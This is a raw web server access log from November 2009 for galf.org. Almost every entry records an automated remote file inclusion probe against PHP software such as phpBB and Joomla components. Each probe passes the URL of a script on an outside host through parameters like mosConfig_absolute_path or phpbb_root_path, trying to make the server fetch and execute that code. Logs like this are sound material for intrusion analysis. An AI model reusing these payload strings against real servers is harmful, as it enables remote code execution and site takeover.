81.176.229.7 - - [09/Nov/2009:06:08:57 -0800] "GET /logs/access_090629.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [09/Nov/2009:06:09:14 -0800] "GET /logs/access_090518.log/?sourcedir=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [09/Nov/2009:06:09:29 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.94.125.100 - - [09/Nov/2009:06:09:35 -0800] "GET /includes/functions_newshr.php?phpbb_root_path=http://kb27.co.kr/bbs///test.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.galf.org"
69.94.125.100 - - [09/Nov/2009:06:09:35 -0800] "GET /logs//includes/functions_newshr.php?phpbb_root_path=http://kb27.co.kr/bbs///test.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.galf.org"
85.111.12.199 - - [09/Nov/2009:06:09:41 -0800] "GET /logs/access_090914.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.thelumosalliance.com/cometchat/.../x???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.8.105.21 - - [09/Nov/2009:06:10:13 -0800] "GET /logs/access_090720.log%20//?path%5Bdocroot%5D=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
203.230.112.35 - - [09/Nov/2009:06:10:27 -0800] "GET /logs/access_090629.log%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [09/Nov/2009:06:10:28 -0800] "GET /logs/access_090629.log%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.70.35.48 - - [09/Nov/2009:06:10:30 -0800] "GET /logs/access_090817.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [09/Nov/2009:06:12:05 -0800] "GET /logs/access.log%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.230.112.35 - - [09/Nov/2009:06:12:05 -0800] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.230.112.35 - - [09/Nov/2009:06:12:05 -0800] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.230.112.35 - - [09/Nov/2009:06:12:06 -0800] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.230.112.35 - - [09/Nov/2009:06:12:06 -0800] "GET /logs/access.log%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.230.112.35 - - [09/Nov/2009:06:12:06 -0800] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
62.141.47.10 - - [09/Nov/2009:06:12:21 -0800] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
62.141.47.10 - - [09/Nov/2009:06:12:22 -0800] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
62.141.47.10 - - [09/Nov/2009:06:12:23 -0800] "GET /logs/access_090316.log%20%20//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.247.200.12 - - [09/Nov/2009:06:12:47 -0800] "GET /logs/access_090316.log%20%20//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.247.200.12 - - [09/Nov/2009:06:12:47 -0800] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
124.247.200.12 - - [09/Nov/2009:06:12:47 -0800] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
69.94.125.100 - - [09/Nov/2009:06:12:55 -0800] "GET /includes/functions_newshr.php?phpbb_root_path=http://kb27.co.kr/bbs///test.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.61 (Macintosh; I; PPC)" "galf.org"
69.94.125.100 - - [09/Nov/2009:06:12:55 -0800] "GET /logs//includes/functions_newshr.php?phpbb_root_path=http://kb27.co.kr/bbs///test.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.61 (Macintosh; I; PPC)" "galf.org"
157.100.45.30 - - [09/Nov/2009:06:13:38 -0800] "GET /logs/access_090316.log%20%20//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.100.45.30 - - [09/Nov/2009:06:13:38 -0800] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
157.100.45.30 - - [09/Nov/2009:06:13:38 -0800] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
62.141.47.10 - - [09/Nov/2009:06:13:56 -0800] "GET /logs/access_090316.log//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [09/Nov/2009:06:14:01 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://cafe21.org//bbs/data/cartoon/images/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [09/Nov/2009:06:14:01 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://cafe21.org//bbs/data/cartoon/images/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [09/Nov/2009:06:14:01 -0800] "GET /logs/access_090330.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://cafe21.org//bbs/data/cartoon/images/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [09/Nov/2009:06:14:01 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://cafe21.org//bbs/data/cartoon/images/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [09/Nov/2009:06:14:01 -0800] "GET /logs/access_090330.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://cafe21.org//bbs/data/cartoon/images/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [09/Nov/2009:06:14:01 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://cafe21.org//bbs/data/cartoon/images/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [09/Nov/2009:06:14:18 -0800] "GET /logs/access_091012.log/?sourcedir=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [09/Nov/2009:06:14:21 -0800] "GET /logs/access_090413.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://cafe21.org//bbs/data/cartoon/images/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [09/Nov/2009:06:14:21 -0800] "GET /logs/access_090413.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://cafe21.org//bbs/data/cartoon/images/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.79.101.98 - - [09/Nov/2009:06:15:04 -0800] "GET /logs/scripts.log/?dir_ws=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.79.101.98 - - [09/Nov/2009:06:15:04 -0800] "GET /?dir_ws=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
213.79.101.98 - - [09/Nov/2009:06:15:04 -0800] "GET /logs/?dir_ws=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
195.70.35.48 - - [09/Nov/2009:06:16:28 -0800] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
195.70.35.48 - - [09/Nov/2009:06:16:28 -0800] "GET /logs/access_090316.log%20%20//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.70.35.48 - - [09/Nov/2009:06:16:28 -0800] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [09/Nov/2009:06:17:49 -0800] "GET /logs/access.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://cafe21.org//bbs/data/cartoon/images/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.40.68.132 - - [09/Nov/2009:06:17:49 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://cafe21.org//bbs/data/cartoon/images/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.40.68.132 - - [09/Nov/2009:06:17:49 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://cafe21.org//bbs/data/cartoon/images/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.40.68.132 - - [09/Nov/2009:06:17:49 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://cafe21.org//bbs/data/cartoon/images/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.40.68.132 - - [09/Nov/2009:06:17:49 -0800] "GET /logs/access.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://cafe21.org//bbs/data/cartoon/images/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.40.68.132 - - [09/Nov/2009:06:17:49 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://cafe21.org//bbs/data/cartoon/images/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
93.158.148.30 - - [09/Nov/2009:06:18:10 -0800] "GET / HTTP/1.1" 200 1048 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
77.221.130.24 - - [09/Nov/2009:06:25:55 -0800] "GET /logs/access_090525.log/?path%5Bdocroot%5D=http://www.masuccessguy.com//audio/swf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.24 - - [09/Nov/2009:06:25:55 -0800] "GET /?path%5Bdocroot%5D=http://www.masuccessguy.com//audio/swf?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
77.221.130.24 - - [09/Nov/2009:06:25:55 -0800] "GET /logs/?path%5Bdocroot%5D=http://www.masuccessguy.com//audio/swf?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
77.221.130.24 - - [09/Nov/2009:06:26:04 -0800] "GET /?path%5Bdocroot%5D=http://www.masuccessguy.com//audio/swf?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
77.221.130.24 - - [09/Nov/2009:06:26:04 -0800] "GET /logs/?path%5Bdocroot%5D=http://www.masuccessguy.com//audio/swf?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
77.221.130.24 - - [09/Nov/2009:06:26:05 -0800] "GET /logs/access_090525.log/?path%5Bdocroot%5D=http://www.masuccessguy.com//audio/swf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.24 - - [09/Nov/2009:06:26:05 -0800] "GET /logs/access_090504.log/?path%5Bdocroot%5D=http://www.masuccessguy.com//audio/swf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.24 - - [09/Nov/2009:06:26:19 -0800] "GET /logs/access_090504.log/?path%5Bdocroot%5D=http://www.masuccessguy.com//audio/swf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.24 - - [09/Nov/2009:06:26:19 -0800] "GET /?path%5Bdocroot%5D=http://www.masuccessguy.com//audio/swf?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
77.221.130.24 - - [09/Nov/2009:06:26:19 -0800] "GET /logs/?path%5Bdocroot%5D=http://www.masuccessguy.com//audio/swf?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
77.221.130.24 - - [09/Nov/2009:06:26:19 -0800] "GET /logs/access_090525.log/?path%5Bdocroot%5D=http://www.masuccessguy.com//audio/swf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.8.105.21 - - [09/Nov/2009:06:27:20 -0800] "GET /logs/access_090511.log//include/admin.lib.inc.php?site_path=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
64.8.105.21 - - [09/Nov/2009:06:27:20 -0800] "GET /include/admin.lib.inc.php?site_path=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
64.8.105.21 - - [09/Nov/2009:06:27:23 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
195.70.35.48 - - [09/Nov/2009:06:27:28 -0800] "GET /logs/access_090316.log//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.234.201.119 - - [09/Nov/2009:06:27:59 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.234.201.119 - - [09/Nov/2009:06:27:59 -0800] "GET /logs/access_090511.log%20%20//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.234.201.119 - - [09/Nov/2009:06:27:59 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.100.45.30 - - [09/Nov/2009:06:28:45 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.100.45.30 - - [09/Nov/2009:06:28:45 -0800] "GET /logs/access_090525.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.100.45.30 - - [09/Nov/2009:06:28:45 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.100.45.30 - - [09/Nov/2009:06:28:58 -0800] "GET /logs/access_090504.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.8.105.21 - - [09/Nov/2009:06:29:17 -0800] "GET /logs/access_090629.log//include/admin.lib.inc.php?site_path=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
211.40.68.132 - - [09/Nov/2009:06:30:00 -0800] "GET /skin/gallery/setup.php?dir=http://www.shopandship.co.za/heheh.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [09/Nov/2009:06:30:00 -0800] "GET /logs//skin/gallery/setup.php?dir=http://www.shopandship.co.za/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [09/Nov/2009:06:30:00 -0800] "GET /skin/gallery/setup.php?dir=http://www.shopandship.co.za/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [09/Nov/2009:06:30:00 -0800] "GET /logs/scripts.log//skin/gallery/setup.php?dir=http://www.shopandship.co.za/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [09/Nov/2009:06:30:00 -0800] "GET /logs/scripts.log//skin/gallery/setup.php?dir=http://www.shopandship.co.za/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [09/Nov/2009:06:30:00 -0800] "GET /logs//skin/gallery/setup.php?dir=http://www.shopandship.co.za/heheh.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [09/Nov/2009:06:30:11 -0800] "GET /skin/gallery/setup.php?dir=http://www.shopandship.co.za/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [09/Nov/2009:06:30:11 -0800] "GET /logs/scripts.log//skin/gallery/setup.php?dir=http://www.shopandship.co.za/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [09/Nov/2009:06:30:11 -0800] "GET /logs//skin/gallery/setup.php?dir=http://www.shopandship.co.za/heheh.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.234.201.119 - - [09/Nov/2009:06:31:39 -0800] "GET /logs/access_090504.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.79.101.98 - - [09/Nov/2009:06:32:12 -0800] "GET /logs/index.php?redir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.79.101.98 - - [09/Nov/2009:06:32:12 -0800] "GET /index.php?redir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.79.101.98 - - [09/Nov/2009:06:32:12 -0800] "GET /logs/access_090720.log%20%20/index.php?redir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.234.201.119 - - [09/Nov/2009:06:32:12 -0800] "GET /logs/access_090525.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.79.101.98 - - [09/Nov/2009:06:32:23 -0800] "GET /logs/access_090406.log%20%20/index.php?redir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.79.101.98 - - [09/Nov/2009:06:32:23 -0800] "GET /index.php?redir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.79.101.98 - - [09/Nov/2009:06:32:34 -0800] "GET /logs/index.php?redir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.79.101.98 - - [09/Nov/2009:06:32:34 -0800] "GET /logs/access_090720.log%20%20/index.php?redir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.79.101.98 - - [09/Nov/2009:06:32:40 -0800] "GET /logs/access_090406.log%20%20/index.php?redir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.247.200.12 - - [09/Nov/2009:06:33:32 -0800] "GET /logs/access_090525.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.247.200.12 - - [09/Nov/2009:06:33:32 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.247.200.12 - - [09/Nov/2009:06:33:32 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.247.200.12 - - [09/Nov/2009:06:33:42 -0800] "GET /logs/access_090504.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.29.90.110 - - [09/Nov/2009:06:35:57 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.29.90.110 - - [09/Nov/2009:06:35:57 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.29.90.110 - - [09/Nov/2009:06:35:57 -0800] "GET /logs/access.log%20%20//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.29.90.110 - - [09/Nov/2009:06:36:02 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.29.90.110 - - [09/Nov/2009:06:36:02 -0800] "GET /logs/access.log%20%20//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.29.90.110 - - [09/Nov/2009:06:36:02 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.234.201.119 - - [09/Nov/2009:06:36:34 -0800] "GET /logs/access_090511.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.234.201.119 - - [09/Nov/2009:06:36:34 -0800] "GET /logs/access_090824.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
